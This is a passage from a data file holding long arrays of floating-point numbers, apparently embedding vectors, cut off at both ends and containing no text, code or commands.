409,-0.007023216,-0.005627108,-0.0027488207,-0.023964733,0.019879283,0.019331198,-0.0069378917,-0.00028904784,-0.008485691,-0.0023010965,0.027860606,-0.033795398,0.0066832835,0.0091859605,0.014697181,-0.013122044,0.005340144,0.009038851,-0.005368756,0.009941949,-0.0017024279,-0.0032394237,-0.013528287,-0.0041663772,-0.024969287,-0.014577659,0.031198286,0.0071615465,-0.03398473,0.004338926,0.0012641231,0.018151965,-0.011543805,-0.009988843,0.0067566,-0.01360626,0.006952451,-0.015536779,0.0061470503,-0.010719501,0.013259436,0.010974533,-0.020160567,0.0027644478,-0.0008682467,-0.034056902,-0.020949002,-0.030594306,0.013540279,-0.008009167,-0.021819202,0.022446288,0.028068654,-0.0052722227,0.005358763,-0.009040841,0.007778273,0.0064812643,0.031970102,-0.0089114765,0.017080015,0.016590456,0.0025289948,0.0070088264,-0.011023534,-0.015166094,0.023134103,-0.011213812,-0.0066937055,0.01512355,-0.009164077,0.0041561928,-0.064831525,0.007107331,0.008319655,-0.0045513813,0.0064039878,0.02128413,0.020187642,-0.005490934,-0.0077250954,-0.0061831446,-0.004930878,0.0046471367,0.018142622,-0.025917692,-0.010104695,-0.0130229695,-0.0071826004,0.043554828,-0.0011874972,-0.0019309449,-0.02298203,0.0026810614,0.0057468126,0.00697592,-0.007228141,-0.0034004408,-0.018369945,-0.020905862,-0.001753202,0.020270888,-0.022333283,0.008191921,-0.022385757,0.0012061134,0.045457225,0.013331765,-0.0031828075,-0.0064961063,0.006952587,0.00221877,-0.009387978,0.0057250015,0.015357922,-0.00912291,-0.01817577,-0.00009787345,0.020203605,-0.015266087,-0.01930795,0.014505088,0.007686162,-0.0056048436,0.04712094,0.017501568,0.023398515,-0.021693295,-0.014814911,-0.00008001301,0.026128339,-0.01312811,0.003816945,-0.0033110017,-0.0023220824,0.016322033,-0.006665313,0.00244586,0.0113464855,0.027250696,0.016917216,0.027376188,0.016493047,0.022392912,0.014332005,0.01940444,-0.001118657,0.012809791,0.03941794,0.008920621,0.0029976398,-0.0053161974,-0.00361561,0.010902855,0.004945641,-0.00667945,0.0016048279,0.01083359,0.0035132044,-0.002648639,-0.0068180733,-0.015809912,0.001884141,-0.0039734603,0.0105984565,-0.000021208316,-0.024942163,-0.0013271301,-0.0006928499,0.00712532,0.0021241037,-0.011565474,0.0011131675,-0.008791564,-0.013506435,-0.015020539,-0.0075666015,0.019884616,-0.00013779341,0.0048436467,-0.013147177,-0.014756942,0.009765083,-0.00700205,0.018880444,0.01356719,0.0017672644,-0.01561918,-0.008708237,0.006951346,-0.010024891,-0.010852786,-0.004390106,-0.0130200945,0.007390201,0.012256041,-0.011360805,-0.008119467,0.015353458,0.0014721721,-0.007336395,0.0015325092,-0.002843437,0.018315524,-0.007360164,-0.009849389,0.0047299424,0.004717867,-0.016219338,0.0014538779,0.026283665,-0.014669188,0.017920678,0.0031797925,0.0070997677,0.0049737403,-0.0023812961,-0.045318753,-0.01265612,0.0031100097,-0.010280256,0.013244443,-0.01502437,0.010888186,-0.006442448,0.0074064755,0.029016571,-0.019982802,-0.008045332,0.030665645,0.004332963,-0.009367081,-0.0006990868,0.015815496,0.0016794498,0.0008589754,0.03447813,-0.021892095,0.033101704,0.0015092156,-0.0013364429,-0.0037371125,-0.0043649757,-0.0008007427,0.008870636,0.003886788,-0.0018062993,-0.003015548,0.011709012,0.0016114241,0.0055891937,0.0059169973,-0.014711553,-0.012524663,0.029893525,-0.034209266,-0.008150059,-0.0038448602,-0.0019865711,-0.030207984,0.006601654,-0.010267215,-0.0063128015,0.0068272618,-0.0053527043,-0.01381598,0.016956087,-0.027383463,-0.003048027,-0.010730275,0.02531911,-0.014147136,-0.005986577,-0.016696457,-0.08558894,0.008587139,0.00893397,-0.0012738046,0.038350534,0.0062515642,-0.015471136,-0.001923157,-0.007753307,0.018300079,-0.0012424949,-0.008817924,-0.0029528562,-0.0026801787,0.034384605,0.008085309,-0.024890805,-0.0052844547,0.016874809,-0.011643071,0.024785409,0.006687858,-0.010168425,0.01058182,0.0055572256,0.0003816721,-0.008571415,-0.013368892,0.015487141,0.0008551053,0.0042405515,-0.016118262,-0.0011842581,-0.0037049805,-0.014977996,-0.0025222988,-0.012877824,0.009403915,-0.018559925,-0.018922973,0.005720569,-0.011829043,-0.004752929,0.0072158678,-0.014276161,-0.003952861,-0.03832235,-0.0014119773,-0.011609553,0.0074200393,-0.015830513,-0.00013821367,0.009649585,0.007320294,-0.0038239753,0.009461908,0.0011401661,-0.004676412,0.03332684,0.00023279747,-0.025628855,0.010216248,-0.0011983677,-0.0027066749,-0.00017383136,-0.00859052,0.005820378,0.0104567,-0.0026507194,0.01502557,0.021725714,-0.044056576,-0.02003915,-0.021014854,-0.005358393,0.00408103,0.002468604,-0.02574756,-0.02197981,-0.0007678416,0.040028885,-0.0020463474,0.015008292,0.012480943,0.0011549756,-0.004675526,-0.01718159,0.019429587,0.015765527,0.0008565082,0.005190422,-0.018839035,0.032006245,-0.011921428,0.0053247865,0.0012035569,-0.010581441,0.0057734507,-0.012334072,-0.017440451,-0.0076847086,0.008890225,0.00025857682,-0.016553944,-0.021772845,0.0076743364,-0.005554154,-0.008948233,-0.0066711525,0.001645465,-0.027197031,0.015942177,0.033752523,0.046190478,0.008566763,0.005446499,-0.0029470022,-0.003829063,-0.026259962,-0.03438974,-0.01681721,-0.0034823525,-0.018538464,0.035128765,0.015983013,-0.013099736,0.010614815,0.003151772,-0.019774107,0.012778446,-0.006238052,0.004344457,-0.008402758,0.014590019,-0.015691105,0.009873427,-0.008918221,0.016212262,0.006961299,0.02457538,-0.0010658868,-0.021786012,-0.008530176,-0.013075384,-0.0046393108,0.023007762,-0.0044307425,-0.016745433,0.0072183725,-0.01710491,0.0061542713,0.0005026733,0.004098034,-0.008980439,-0.0043852767,-0.006379673,0.0039179362,0.0044076457,-0.014486883,-0.01692158,-0.0023860184,0.009190629,0.009575545,-0.0060115913,-0.015158421,-0.0067570293,-0.0020661321,0.013110902,0.0011632079,0.010122803,-0.023947207,-0.008474256,-0.0042658825,-0.0066002924,-0.010473194,-0.013185875,0.024807744,0.023636885,-0.015872728,-0.012784309,-0.03379204,0.015732547,-0.00699885,-0.0062913517,0.0058917133,-0.020580638,-0.0059725647,-0.013178152,0.007857219,-0.013394612,0.007751954,-0.016522672,-0.0059231296,0.003400335,-0.014770562,-0.016466832,-0.0021467495,0.011326654,-0.01715047,0.014530797,-0.010616748,0.016810162,-0.019498002,0.015215724,0.028197462,0.0028954544,-0.009335355,0.020590013,-0.026586272,-0.010697142,0.005140698,0.015938768,0.01149106,0.12562385,0.0043968786,0.005827358,-0.00040209663,0.005714851,0.01723264,0.0102045415,-0.009257817,-0.0030201357,0.025505975,0.026937867,-0.010177548,0.020141196,-0.0080854315,-0.008719814,0.022458404,0.020887865,-0.009140654,0.019980194,0.022997739,0.02394245,-0.0119672455,-0.020992626,-0.06809557,-0.027435122,-0.072746865,0.025389057,0.020701032,-0.008041004,0.020527044,0.0081414385,-0.014305799,0.009416899,0.008345182,-0.0304639,0.0059308205,0.011199322,-0.01877033,0.009298927,-0.026545653,0.022971097,0.002222883,0.0032257445,-0.019963026,-0.010566284,-0.012314599,0.0003078688,0.006646297,0.0004964385,-0.020051917,0.0014311003,0.0038678914,0.01003524,-0.0071562896,0.013568718,-0.012981396,0.009795908,0.008600786,0.027925674,0.01181423,0.017436685,0.00984121,0.009800732,-0.018527268,0.01809118,-0.012155356,-0.01143454,-0.012880337,-0.003313869,-0.019960627,0.012005781,-0.014590279,-0.008327482,0.0007771583,0.006933773,0.004350665,-0.008756122,0.00849693,0.018134983,-0.01816132,0.014841455,-0.004673446,0.018403267,0.011003727,0.009347779,-0.010662621,-0.0061694877,0.0032777728,0.0052378564,-0.005020395,-0.020958275,0.007186384,0.023248993,0.0061026793,-0.017874084,0.009858212,0.023983285,0.0052213366,-0.0101664625,0.021074688,-0.010087898,-0.03677725,0.0020677047,-0.0012035095,0.0019217703,-0.0076021557,-0.004621966,0.042288654,-0.00057210797,0.00427051,-0.0077019823,-0.0022019316,0.015972227,0.005324226,0.0010616134,0.04011889,-0.026250536,-0.021136755,0.007571887,-0.02955184,-0.017086312,0.0047556493,0.014260583,0.03080658,0.0054953084,0.021004274,-0.0221045,0.0020703985,-0.000117678464,-0.020587385,0.006367146,-0.0058162445,0.0029357069,0.029465383,-0.010905384,-0.0026943844,0.032522995,-0.006099903,0.007952825,-0.009959569,0.0022390846,-0.0048319646,-0.009077604,-0.00877749,-0.0035757276,-0.013323834,0.019334173,0.0021104375,0.008853736,0.006806044,0.00044632208,0.016734177,-0.010578686,-0.00741793,-0.0029533159,-0.008455918,-0.016927266,0.010177536,-0.0076845908,-0.0092534255,0.006185244,-0.0069119474,0.022677021,-0.0426039,0.014973075,0.015508002,0.005552442,-0.0067977197,0.015323328,0.001742944,-0.009484673,0.0021316118,0.009142078,0.020340314,-0.012782924,0.00010439659,0.0019033576,0.026077496,-0.006498759,0.009176223,0.037557986,0.013408827,-0.0033497473,-0.006432059,0.002353389,0.009169569,-0.0080773905,-0.005097228,-0.0065141697,0.009262745,-0.007116064,-0.009720153,-0.011531971,0.0073033026,-0.018215483,0.018298022,-0.02819287,0.02065426,-0.017034747,-0.044404317,0.009410135,0.0068899244,0.03730707,-0.019913787,0.013964153,-0.008157435,-0.017175844,-0.010193016,0.0010616605,-0.023133418,0.013835953,0.014264128,-0.00032166654,-0.027150897,-0.009660483,0.0013730275,-0.0052132704,-0.026238644,-0.013544472,-0.0013350693,0.0024440477,-0.00398679,0.004522576,-0.010611048,-0.011293331,-0.0011470607,-0.027988778,0.0011106875,0.018454688,-0.015829558,-0.0183273,-0.0025095057,-0.0066121863,-0.021068893,-0.014004773,0.005131066,0.040956043,0.020684397,0.0030734634,0.012444562,-0.0047588823,0.010056822,0.016746055,-0.0024474002,-0.012168057,0.0047387923,-0.009691884,0.0033463184,0.0021877165,-0.003122394,-0.034743518,0.005004538,-0.016584352,-0.0056915395,-0.01162374,-0.00039179332,0.0049478915,0.028197806,0.013486023,-0.01072984,0.02257434,0.027775122,-0.0066583143,0.028571595,0.008905952,0.011973856,-0.012587767,-0.016497869,0.004722535,-0.0063788635,-0.01456773,-0.014774887,-0.008747396,0.03465554,0.020164944,0.01598655,-0.010345658,-0.016505694,0.0010819258,0.00061008404,-0.0026631467,-0.019688493,-0.011542859,-0.016901804,-0.0072950833,-0.02113348,-0.0012393016,0.030196765,0.054283947,-0.06991744,-0.0051740645,-0.0065713106,0.000035453348,-0.025627192,-0.0005849493,0.014767837,-0.023763906,-0.028316364,0.034556996,0.0024136014,-0.011174234,-0.03500747,0.004391584,-0.0010153565,-0.016628245,0.0035048649,0.030924307,-0.005578606,-0.007125655,0.022765575,0.0032219845,-0.00075359625,-0.010901408,0.0015964871,-0.028233463,-0.0021402442,0.0121438475,-0.00048300487,0.009943177,0.011324957,0.0028538406,-0.03336213,0.00009381166,0.009538618,-0.0014070484,0.024892932,-0.0092333015,-0.025023801,-0.022636406,-0.010367398,-0.015475911,0.023434307,0.013757368,-0.04122533,-0.0135992095,0.026357265,0.0035026493,0.1460107,-0.014459788,-0.00501617,0.021213746,0.0033630913,-0.030450694,0.034057584,0.027613342,-0.00043424137,0.011972144,0.00582268,-0.0026488036,-0.0078091286,0.033470258,-0.0018363169,0.002162507,0.0031682423,0.1382253,-0.004510428,0.030276284,0.014321648,0.010102013,0.011682776,0.02478542,0.022435376,-0.07237357,-0.012250198,-0.030906336,-0.0139735285,0.01712313,-0.039974876,0.025617022,-0.00842162,0.005325289,-0.024935713,0.009009236,0.009765262,0.0018829801,-0.033677842,-0.009328629,0.006926552,0.00025182558,-0.013557679,0.0013683795,-0.0017143269,0.009236243,-0.0325841,-0.013612758,0.016493654,0.045144305,0.014651109,-0.00405998,0.012980462,0.021846976,-0.0015484194,0.0051981583,0.008747321,-0.006006972,-0.046022438,0.011185818,-0.014460991,0.00401069,-0.009533585,0.04405478,-0.0077738976,-0.012457851,-0.031397562,0.0035915072,0.0070508085,0.024586385,0.015408173,0.0031968807,-0.018137572,-0.0006694316,0.03406636,-0.009630655,-0.01352894,0.010569721,-0.005510768,-0.006738777,0.03415269,0.0001979084,-0.0039222436,-0.014441094,0.015005032,-0.01342464,-0.00978726,-0.0042534363,0.02024603,0.00410988,-0.02341045,0.022528468,-0.01974937,0.020328619,0.02848849,0.01625523,0.0011689375,0.010719119,0.008549261,-0.027804341,-0.011293715,0.0042331163,-0.012624528,0.00044537298,0.0014766552,0.02177862,-0.028063335,-0.017588597,0.003907652,0.017049955,0.013015982,-0.0028767602,0.0011019316,0.015707342,-0.007236156,-0.0041345735,-0.026733749,-0.02272579,-0.021969628,0.0029559624,-0.008828948,-0.0050601563,-0.010116101,0.022833405,-0.0296075,0.00171006,0.01468052,0.015677622,-0.037307356,0.0071166814,-0.01140678,-0.0018607203,-0.0025089886,0.06372476,-0.0026679696,-0.0054781404,-0.002433313,-0.039731175,-0.021257048,-0.0031879717,0.008824461,0.0076617324,0.020313563,-0.009765251,-0.0095799845,0.005235337,0.01540447,-0.012511694],[0.00861296,-0.015898177,-0.018140676,-0.042294264,0.011153217,-0.028019348,-0.00051773235,0.008939927,-0.020692883,-0.0131339505,0.002736337,0.009478353,-0.000060680926,0.007063112,-0.0020751753,0.0031259467,-0.003397666,-0.0013713399,-0.015752971,0.017061628,0.0032956365,-0.0071438965,0.017250327,-0.021239059,0.010978627,0.0064563835,0.002773967,-0.010270157,-0.008064137,0.03377754,-0.003986823,0.029850096,-0.007724121,0.0027655337,-0.0062266025,0.0029013387,-0.007338109,-0.010597888,0.004113919,-0.00006256926,-0.0071160975,0.0013846965,0.0024861256,0.023732517,-0.014146159,-0.009556534,0.010058558,0.020482125,-0.009473485,0.0013255232,-0.001753842,-0.0016156506,-0.036025953,0.029657673,-0.022474905,0.0054061403,0.008442661,-0.02780211,0.0123135345,-0.006967124,0.005443212,0.02702898,-0.014542481,-0.03012252,0.004523274,-0.028469542,0.006438337,-0.017050091,-0.018584382,-0.017360944,-0.009694591,-0.00941755,-0.0027443853,0.008968624,0.022293935,-0.009144103,0.0024642022,-0.024980133,-0.026002595,0.0069901445,-0.0042574285,-0.012481946,0.012014546,0.0037624692,-0.005373249,-0.0045066476,0.010793441,-0.027116904,-0.018037083,-0.022980208,-0.022185931,0.01216188,-0.013140661,0.009573041,-0.019829439,0.0151515,0.018360673,0.007491573,-0.0041401163,0.015016142,-0.015835078,-0.0037774262,-0.008155617,0.0098596485,0.021097919,-0.022775851,-0.002478174,-0.000076417695,-0.004818513,-0.02396738,0.0014241497,-0.0035865186,0.0066634086,-0.0027375994,0.02081846,-0.005121016,-0.007815882,-0.003872751,-0.0052430844,-0.0025971949,0.0082884515,0.024671338,0.021481069,0.014838017,-0.0030142963,-0.016687067,-0.012740352,0.018568723,0.007266664,0.0018937371,-0.004327698,0.031968653,-0.012322611,-0.023052486,-0.01566423,-0.008184598,0.000049715243,-0.008296798,0.002433636,-0.009974384,0.005106929,0.0025601794,0.010642313,-0.010235631,0.027331386,0.009032698,-0.002497265,0.0069329585,0.026497137,-0.0016303031,0.00837054,0.000010392628,-0.01528244,-0.011147519,0.0020937673,0.031382903,0.017476406,-0.013843946,-0.005665965,0.0021442005,-0.03309335,0.019689748,0.03580063,-0.014785851,-0.004412952,-0.048628226,-0.008139412,-0.011133881,-0.018571964,-0.022429442,0.025548935,0.011947617,0.014955468,0.013948607,0.0074104494,-0.0004488937,0.0019009155,-0.009293145,-0.01617387,-0.0077476194,0.0013005338,-0.0070148376,0.009746613,-0.0034959463,0.0023970664,0.015552128,0.011576829,-0.01007258,-0.001320876,-0.00940986,-0.012657552,-0.018358003,-0.019932628,-0.008921708,-0.024075355,-0.015903842,-0.010659834,0.08845127,-0.0019330586,-0.0030025004,-0.02092876,0.0072094817,0.01303827,-0.016708871,0.0001819352,-0.0070800055,0.008291144,-0.01040392,0.01934467,-0.00579172,0.021573571,-0.013179815,0.0029629674,0.015581772,-0.0007799854,-0.05768305,0.006227083,0.026640672,0.01072315,0.0068890285,-0.02771461,0.005181284,0.013029128,-0.03340939,-0.0154884765,-0.02074268,0.002970913,-0.0020446933,0.011209004,-0.024772134,0.014755827,-0.0082167275,-0.03967141,-0.010133733,0.010264633,-0.019169576,0.0056492393,-0.023441626,0.0041872524,0.0018478628,0.0033180623,0.00102802,0.028252646,0.025130587,-0.012272322,-0.009896394,0.010277435,-0.0028409034,0.0074306983,0.016406884,0.015974829,-0.0019306876,-0.023264885,0.0090880785,-0.004172183,-0.01010862,0.005319556,0.00033926254,0.007687587,0.006240892,0.038818855,0.019313527,0.0051712934,0.043378763,0.027270176,0.018033065,-0.004177053,-0.042152558,-0.008223167,-0.0284768,-0.018984446,-0.004437723,-0.0036672559,0.0039816448,0.023714526,-0.018179245,-0.014110689,0.013360707,-0.0044213966,0.012763324,0.001367744,-0.0011774965,-0.0048788376,-0.022843732,0.006301182,0.0147728715,-0.02603802,0.0043283617,0.013453175,-0.0008352235,-0.012562474,0.010813363,0.033404335,-0.00971347,-0.02094205,-0.014039102,-0.015015602,0.0069590253,0.011216353,-0.010959951,0.0049311924,0.002163033,0.021844886,0.015852379,-0.009849254,0.012909799,0.0014895949,0.043297295,-0.012971682,0.0029236062,-0.029613018,-0.00016352045,-0.03627129,-0.0059710317,0.007819764,0.008739974,0.002905578,0.00066448085,-0.013213913,0.004249506,0.020328535,-0.02899634,0.017371625,-0.023617527,-0.017305726,0.008061492,0.01773513,0.010344418,0.0069127423,-0.0008937468,-0.0020557118,0.007202542,0.015120841,0.02177556,0.0079190545,0.019712131,-0.011921413,0.0104940515,0.0020230054,-0.012236965,-0.01775718,-0.014014349,0.008916434,0.00024704344,-0.002668611,-0.02334815,-0.0068674376,0.013357338,0.020674063,0.023832472,0.025072388,0.002204886,-0.0017944737,0.018358406,-0.037526898,0.013792886,-0.019869907,-0.013307353,-0.0075210994,-0.029441705,0.012025848,-0.013506627,-0.0057022143,0.016574629,0.059094336,-0.022231437,-0.01324096,0.03380855,-0.0165807,0.003003633,0.019738618,0.009507589,0.013884172,0.0036581384,-0.0041100737,0.00943723,0.011648729,-0.0055651357,-0.011930956,0.003170521,-0.034225598,-0.033917837,-0.025132656,-0.026116319,0.015410092,0.0048171254,0.009630014,0.031664267,0.0012501457,0.025550922,0.009754725,0.027776033,0.01961523,-0.008595293,0.0016037956,0.0083181765,0.0153159,0.01030131,-0.03659775,0.015436657,0.0005683082,0.010557029,-0.017984388,0.010549485,-0.0016812332,0.0013926906,-0.0022306193,-0.023528563,-0.016759992,0.043137677,0.0036980063,0.0037240968,-0.027967703,-0.00037884116,0.0005835845,0.035918448,-0.029714312,0.013751316,0.010099151,0.00882604,0.017989311,-0.021388814,0.021625657,0.013882551,0.03218918,0.018943362,0.0044120294,0.010090799,0.00060939445,0.033937406,-0.0048393793,-0.005198634,-0.0014246173,0.0109952185,-0.0059730615,0.002284562,-0.008346156,-0.0008529131,-0.001845705,0.008734119,-0.00006412464,-0.007499696,0.007771046,0.008620399,-0.025030233,-0.0035313638,0.006968384,0.0020248387,-0.03081267,-0.0010202321,0.0019631058,0.021139365,0.011955226,-0.0005400481,-0.012917809,0.003953607,0.007085854,-0.009272571,0.031002281,0.027077934,0.019301698,0.008800231,0.014934561,0.0034687873,0.008795901,-0.022653438,-0.0047378168,-0.026185095,-0.006768709,-0.007364858,-0.003371159,-0.013864651,0.010226571,0.03460909,-0.017083459,-0.015112254,-0.002332931,0.003316683,0.00023705597,-0.011572622,-0.004119986,-0.009100672,0.00094104325,0.002281415,0.03998148,-0.002600468,0.013267148,0.0068843663,-0.004195201,0.0077429223,0.0036667755,-0.002023557,-0.008147663,0.028370801,-0.009627956,0.03224983,0.0032458808,-0.0293576,0.012542059,0.0010800317,-0.013485704,-0.032512993,0.035640705,0.0068953284,0.011340192,0.028531045,0.031390823,0.0057031563,-0.0043053636,0.022519486,0.034414675,-0.0014539581,-0.01914577,-0.015195522,-0.016594868,-0.0010372016,-0.015092994,-0.0082369605,-0.0072893584,-0.013176992,0.0056465906,-0.014456502,-0.017446797,0.0175087,0.026099319,-0.025310041,0.023457952,0.00956818,0.004966363,0.03617227,-0.0005455703,0.052705552,0.006373128,-0.03156931,0.015419451,0.012931657,0.016120067,-0.015896395,0.01475989,-0.012485261,0.03132776,-0.0043745805,0.0070778155,0.012789007,0.025297236,-0.0146728745,0.012935695,0.023146253,-0.010090317,-0.017000211,0.0057927263,0.0073200343,-0.005885068,-0.015563645,-0.005693933,-0.009828721,0.017623356,0.017367871,-0.011344824,-0.018826006,-0.02719065,-0.010505388,-0.018096348,0.009381477,-0.011977388,0.024665747,-0.0013527508,0.025166167,-0.012851778,-0.014488261,0.0393052,-0.009693513,-0.0063097277,0.010699462,0.0052253855,0.012385206,0.026191132,0.020871479,0.024128426,0.012499173,0.011705366,-0.0109315505,0.019822013,0.011520197,0.0046614693,-0.03139658,-0.0000074973464,-0.0044616107,0.0048438874,-0.004555207,0.00015917844,-0.015376053,0.0018434675,-0.00771141,-0.012194078,-0.038891148,-0.0037523732,-0.0005577184,-0.012430233,0.004015426,-0.02899859,-0.0069410736,-0.0033840113,0.000107210224,-0.0043260963,0.01944426,0.02211572,-0.012450642,0.020986546,0.0023552862,-0.012433461,-0.000011349389,-0.007660079,-0.000023451461,-0.009825868,0.020109363,0.00013973625,-0.022008687,0.0090143895,0.0019572221,-0.023927687,-0.010577818,-0.015974222,0.012743271,0.01726868,0.02502098,-0.02238055,-0.0044728434,-0.03253104,0.00067249587,0.035907805,-0.016111726,0.009126406,-0.002441706,0.033373233,-0.012301993,-0.008942708,0.015056059,0.01885249,-0.012040903,-0.009631903,0.0028376228,-0.06442673,-0.008824862,0.011820034,0.016564682,-0.0038486265,0.0389893,0.011111154,0.011915465,0.013989164,-0.00949086,0.0065173064,0.012354937,-0.009202149,0.012580514,0.029444981,-0.005188931,-0.014510996,-0.014085435,-0.020235674,-0.034006298,0.0013406485,0.0309749,0.009236388,0.009386503,0.007007078,0.01363162,-0.0017187783,0.0040435204,-0.010742898,-0.039311685,0.018863965,0.012328788,-0.016190888,-0.00049351505,-0.036227692,-0.006187419,-0.0023524393,-0.01448723,-0.00011954882,0.0034663137,-0.00046662695,-0.021704616,-0.013512307,-0.0014961726,-0.021642067,0.013371617,-0.01136089,0.011250533,0.00696681,0.031327244,0.013719762,0.0032757232,-0.0032593939,0.013248269,-0.013146772,0.012454999,0.0018037569,0.041389316,-0.0060383156,0.017192157,0.0031665931,0.0023295875,-0.01991437,-0.016290506,0.025845962,0.030256482,0.04121448,0.025439985,0.016245693,-0.029491862,0.020844702,0.009882307,0.00120546,-0.019369284,0.027218971,0.013730206,0.010220372,0.00792822,0.005718276,0.013017794,0.0047097737,-0.038534913,-0.005532628,0.025855545,0.009224198,-0.004695847,0.0030512973,0.0040857345,0.008001845,-0.0048859008,0.00440658,-0.006573328,-0.02460749,-0.012009727,0.011671591,-0.024066232,0.0004079064,-0.03515266,-0.016426167,0.0055382685,0.025358804,-0.010945965,-0.0075166356,-0.0020949729,0.01133642,-0.0009056525,-0.017265901,-0.049739238,-0.0077697467,0.030644475,-0.008208191,-0.0125157125,0.005370212,0.0055027185,-0.0028579498,0.012040268,-0.014422583,-0.007621145,-0.03074366,-0.006329544,-0.0012562539,0.0065178396,0.025161905,0.012662258,-0.020864198,0.020551987,-0.0077895015,0.014642636,-0.006759901,-0.007384545,-0.005504224,0.007233489,-0.005369201,0.0029344335,-0.032265607,-0.0012715125,-0.007480241,-0.013966716,-0.008649532,-0.0132725155,0.0235986,0.0044527575,0.015295935,0.00026625348,0.037664663,0.024510713,0.001784752,0.017125983,-0.011228424,0.0029586344,0.01368983,0.016905554,-0.0012463784,-0.02936404,0.0124327885,0.009683249,-0.005089115,0.0015120958,0.0038219953,0.004998146,-0.022517633,-0.034877837,0.005751858,-0.025864115,0.009004473,0.010170514,-0.02943691,0.016193511,0.0016796234,0.030937288,0.02058681,-0.0076401383,0.0030532174,-0.015348835,-0.0037118667,-0.029496627,-0.0217473,0.008049671,0.023785101,0.020683236,0.013966124,-0.019979153,-0.045362893,-0.018032828,0.026347354,0.008708793,0.017426146,0.01997461,-0.001376079,-0.032606196,0.00946194,0.022707539,0.0012816407,-0.02191669,0.012215745,-0.0060769413,0.005960613,0.018708473,0.015471229,-0.010084324,0.015500856,-0.0035288206,-0.0025086068,0.016308846,-0.019139387,-0.005453243,-0.0034106164,0.007249606,-0.01760018,-0.0045600245,0.011556085,-0.0052493685,-0.003176705,0.034198806,0.00045713544,-0.0067565986,-0.013954217,-0.025803365,-0.009314645,-0.00086260494,0.0015387874,-0.026345888,0.0031958467,0.00049440435,-0.0075190044,-0.0033346335,0.0028346214,0.01824038,0.019933352,0.013754964,-0.0022803969,-0.0050997757,-0.023655731,0.0009445623,-0.012375152,0.0015962755,0.021697717,-0.022048665,0.0072051133,0.017344343,0.017557397,0.004216197,0.0016393671,0.02266251,0.016603703,0.009337193,0.007357917,-0.022313163,-0.007291026,-0.01746446,0.0068765287,-0.026717134,-0.014972492,-0.012883305,0.00987356,0.023530204,-0.017298808,0.0076010763,-0.019810554,-0.0048820707,-0.0013046812,-0.017513864,0.021600138,-0.017071407,-0.010423548,-0.0230275,-0.011803015,0.023994654,-0.0015194054,-0.0062330104,0.014834822,0.009976599,0.0131130265,0.027622234,-0.012844419,0.008818154,0.0089605795,-0.007132973,0.017073667,0.0013777883,-0.004407045,0.013994063,0.024611754,-0.014598639,0.016395645,-0.010880916,-0.011932311,-0.010576031,0.0041777557,0.0037726036,-0.0074082734,0.009778225,0.013398444,0.002744033,0.0026672971,0.0019965824,-0.0528232,0.022458216,-0.0053603854,-0.0039015221,0.002487094,0.009121655,0.0078396695,0.0027120265,0.018671343,-0.00695227,0.003979892,0.0005384342,0.00031950776,0.0017642649,0.0020781683,-0.014095602,-0.047590233,-0.021187413,0.020224975,0.0087614935,-0.027782734,0.0007451515,0.013949123,0.013206239,0.032875355,0.014650318,0.0058464617,0.0043430342,-0.028013796,0.011732417,-0.0030518214,-0.00524928,0.0011601519,-0.000024541368,-0.020089814,-0.01100411,0.0014720168,0.01916672,-0.0048389724,-0.013798752,-0.018138992,-0.033255056,-0.0030008084,0.029813386,-0.007672859,-0.02455333,-0.0006431542,-0.023919923,0.008692288,-0.025519412,0.029749563,-0.004360421,0.0068724086,0.019257216,-0.017968953,0.027987404,-0.013786871,0.006252875,0.0032288458,0.013820186,0.0041543236,-0.013413467,0.030713001,0.015988259,-0.008388288,-0.0025527389,0.0023741308,0.032025173,-0.014772745,-0.022506727,-0.015971199,-0.01731746,0.008052954,-0.012702439,-0.012707937,0.02502062,-0.020978263,-0.0027610222,-0.0034096588,-0.01590327,-0.025298567,0.0122303255,-0.014216828,0.0021616544,-0.002112307,0.016969461,0.0020402616,0.015964778,0.013968414,-0.016475337,-0.017886037,-0.009518281,-0.0045084935,0.028217414,0.011886922,0.016158974,0.013630744,0.013105076,-0.01226155,-0.0240508,0.03035274,-0.0045020855,-0.0027725413,0.05207372,0.005172573,0.0008983912,0.025693929,0.019822774,0.02342507,0.020752177,-0.010303099,0.012249144,-0.0065795043,0.010145596,0.0005457579,0.024010424,-0.0036009334,-0.0038576764,0.021051558,0.04593894,0.011867704,-0.010370606,0.009226251,0.01163397,0.0068079843,0.019310083,0.0100791855,-0.007244025,-0.019118538,-0.003248792,0.001313283,0.01809201,0.009488703,-0.01245251,0.0025495968,0.0019285503,0.010551686,-0.022192385,-0.008939411,-0.0052757687,-0.026439354,0.0067544375,-0.0028513144,0.009815001,-0.0025996321,-0.000919891,-0.009157648,0.027465777,0.008118122,0.0037858994,0.015192051,0.013913863,0.0027488058,0.013258477,0.0073394543,0.013317636,-0.008820709,-0.013204624,-0.000899707,0.01116579,0.0121498015,-0.013417917,0.004170444,0.02075185,-0.039124034,0.005051366,-0.019536652,-0.005946453,-0.007155931,-0.014651529,-0.0063696485,0.031083198,0.0124400575,0.019941092,-0.0060904287,-0.023839138,0.012256119,0.0058689015,0.008382134,0.0074939737,0.0059810975,0.046248212,0.008860608,-0.0074386867,0.00876879,-0.023440994,0.0025357865,0.009036179,-0.025777278,-0.007070235,0.011794533,0.008788188,-0.000274459,0.0046408563,-0.02227568,0.049830094,-0.010076141,0.030969596,-0.0034803236,-0.032565683,-0.0053602117,0.012790996,0.019358741,0.012324798,-0.031226171,0.0037018105,0.00032693284,-0.047646496,-0.026824597,0.0063317292,-0.008924735,-0.0044490444,-0.017023373,0.0063149314,0.0100825345,0.020345477,-0.02484813,-0.001969023,-0.00016598373,-0.012080077,0.002700695,0.017370569,-0.0029081167,-0.0070457286,0.031009153,-0.006567277,0.009666765,0.021295121,-0.0073152757,-0.018938975,0.013193457,-0.002450471,0.032502934,0.015458433,-0.02205242,0.017661406,0.017301492,0.008440485,-0.008137147,-0.019789092,0.003397833,0.009998574,-0.0065194555,-0.0009428717,-0.0108284475,0.030503562,-0.008348979,-0.008203152,-0.0033640594,0.034318246,0.011556901,0.0031829027,0.011181972,0.0077772327,-0.03248828,-0.015853243,-0.024803832,-0.031643055,-0.004723542,-0.012534023,-0.009624448,-0.0042591104,-0.018416384,0.013023895,-0.024005132,-0.012549805,-0.0046516396,0.0051820595,0.024165872,-0.0014747169,0.0031036653,0.0052291113,-0.00039064948,0.007107269,-0.014409629,0.011481291,-0.0142141385,-0.0004320938,0.022084292,0.023725906,-0.015458565,0.009636641,0.01664883,-0.014616678,0.025563033,0.020122958,0.009997327,-0.01633905,0.026790645,-0.015789494,-0.011343114,-0.0036904407,-0.00019967438,0.008971237,0.016066533,-0.014022181,-0.004963139,-0.01461708,0.0066365683,-0.010401364,0.06568772,-0